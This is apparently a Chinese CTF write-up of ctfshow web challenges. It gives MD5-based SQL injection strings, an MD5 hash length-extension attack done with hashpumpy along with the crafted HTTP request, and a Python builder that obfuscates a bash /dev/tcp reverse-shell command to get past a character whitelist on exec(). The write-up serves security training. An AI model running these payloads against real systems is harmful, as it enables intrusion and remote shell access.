web697
先扫一下,其实也可以不用扫
因为什么也扫不出来
这里看到有一个参数
尝试一下数组
随便输了,出了验证回显抓个包看
ffifdyop
e58
4611686052576742364
这三个md5加密可以自带引号
SELECT master FROM secret WHERE password = binary ' ,¹b¬Y[–K-#Kp'
web698
hash长度攻击
以为是注入但是admin之后给的提示是hash
cookie中有个值为0,此时如果我们改成1会怎么样呢
@error_reporting(0);
$flag = "flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxx}";
$secret_key = "xxxxxxxxxxxxxxxx"; // the key is safe! no one can know except me
$username = $_POST["username"];
$password = $_POST["password"];
header("hash_key:" . $hash_key);
if (!empty($_COOKIE["getflag"])) {
if (urldecode($username) === "D0g3" && urldecode($password) != "D0g3") {
if ($COOKIE["getflag"] === md5($secret_key . urldecode($username . $password))) {
echo "Great! You're in!\n";
die ("<!-- The flag is ". $flag . "-->");
}
else {
die ("Go out! Hacker!");
}
}
else {
die ("LEAVE! You're not one of us!");
}
}
setcookie("sample-hash",
, time() + (60 * 60 * 24 * 7));
if (empty($_COOKIE["source"])) {
setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
echo "<source_code>";
}
}
得到secretkey然后就可以为所欲为了,但是这个怎么得到呢
从sample-hash里面爆破出来诶那怎么获得呢,这里由于ctfshow的源码问题,我们的
hash_key=d5e1090511b80a55f206f1b0c03c8b5a;
就是
也就是说md5(secretkeyadminadmin)
得到的值
import hashpumpy
# def hashpump(hexdigest, original_data, data_to_add, key_length)
aaa = hashpumpy.hashpump("d5e1090511b80a55f206f1b0c03c8b5a","D0g3","bao",14)
print(aaa)
脚本和工具都可以打通,但是这个包我一直下载不了
我就在kali下载的工具打的,怎么下载就不说了,网上是有教程的
最后的包
POST /index.php HTTP/1.1
Host: 35a5d8b0-2503-4449-b7bc-6a86be132b0a.challenge.ctf.show
Cookie: hash_key=d5e1090511b80a55f206f1b0c03c8b5a; source=1;getflag=b3e208bbd53844729543fbbcd34e254c
Content-Length: 182
Cache-Control: max-age=0
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://35a5d8b0-2503-4449-b7bc-6a86be132b0a.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://35a5d8b0-2503-4449-b7bc-6a86be132b0a.challenge.ctf.show/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
username=D0g3&password=D0g3%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00bao&submit=submit
但是为什么是14呢上面的长度明明是16哇
Input Data to Add:这个是可以随便填的(添加的内容)
Input Signature:填原始的md5
Input Key Length: 不知道
predicted sig:转化出来的md5
文章非常好的文章
web699
<?php
highlight_file(__FILE__);
if(isset($_POST["cmd"]))
{
$test = $_POST['cmd'];
$white_list = str_split('${#}\\(<)\'0');
$char_list = str_split($test);
foreach($char_list as $c){
if(!in_array($c,$white_list)){ 相当于正则,只能用上面的符号构造命令
die("Cyzcc");
}
}
exec($test);
}
?>
这里的思路是进制表示命令那么使用特性构造出数字之后再打
介于是位运算我也不太熟那么本地一下?
欧克经过本地尝试决定还是记笔记吧有点难以理解
import requests
# 八进制
n = dict()
n[0] = '${#}'
n[1] = '${##}'
n[2] = '$((${##}<<${##}))'
n[3] = '$(($((${##}<<${##}))#${##}${##}))'
n[4] = '$((${##}<<$((${##}<<${##}))))'
n[5] = '$(($((${##}<<${##}))#${##}${#}${##}))'
n[6] = '$(($((${##}<<${##}))#${##}${##}${#}))'
n[7] = '$(($((${##}<<${##}))#${##}${##}${##}))'
f = ''
def str_to_oct(cmd): #命令转换成八进制字符串
s = ""
for t in cmd:
o = ('%s' % (oct(ord(t))))[2:]
s+='\\'+o
return s
def build(cmd): #八进制字符串转换成字符
payload = "$0<<<$0\<\<\<\$\\\'" #${!#}与$0等效
s = str_to_oct(cmd).split('\\')
for _ in s[1:]:
payload+="\\\\"
for i in _:
payload+=n[int(i)]
return payload+'\\\''
print(build('bash -i >& /dev/tcp/IP/port 0>&1'))
$0<<<$0\<\<\<\$\
$0<<<$0 是-bash
\<\<\< 这个是<<<
web700
[安洵杯 2019]cssgame
csrf 没打通,不懂为啥
哎,这些题一个题就够我喝一壶了,有些麻烦